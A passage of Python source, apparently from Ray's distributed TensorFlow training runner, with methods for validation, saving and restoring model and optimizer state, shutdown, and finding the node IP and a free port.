return stats
def validate(self):
"""Evaluates the model on the validation data set."""
stats = {}
evaluate_config = {"verbose": self.verbose}
evaluate_config.update(self.config.get("evaluate_config", {}))
results = self.model.evaluate(self.test_dataset, **evaluate_config)
if results is None:
# Using local Model since model.evaluate() returns None
# for MultiWorkerMirroredStrategy
logger.warning("Running a local model to get validation score.")
self.local_model = self.model_creator(self.config)
self.local_model.set_weights(self.model.get_weights())
results = self.local_model.evaluate(self.test_dataset,
**evaluate_config)
if isinstance(results, list):
stats = {
"validation_" + k: v
for k, v in zip(self.model.metrics_names, results)
}
else:
stats = {"loss": results}
return stats
def get_state(self):
"""Returns the state of the runner."""
return {
"epoch": self.epoch,
"weights": self.model.get_weights(),
"optimizer_weights": self.model.optimizer.get_weights()
}
def set_state(self, state):
"""Sets the state of the model."""
self.model = self.model_creator(self.config)
self.epoch = state["epoch"]
self.model.set_weights(state["weights"])
# This part is due to ray.get() changing scalar np.int64 object to int
state["optimizer_weights"][0] = np.array(
state["optimizer_weights"][0], dtype=np.int64)
if self.model.optimizer.weights == []:
self.model._make_train_function()
self.model.optimizer.set_weights(state["optimizer_weights"])
def shutdown(self):
"""Attempts to shut down the worker."""
del self.model
del self.train_dataset
del self.test_dataset
def get_node_ip(self):
"""Returns the IP address of the current node."""
return ray.services.get_node_ip_address()
def find_free_port(self):
"""Finds a free port on the current node."""
return utils.find_free_port()
| [
"[email protected]"
] |
Subsets and Splits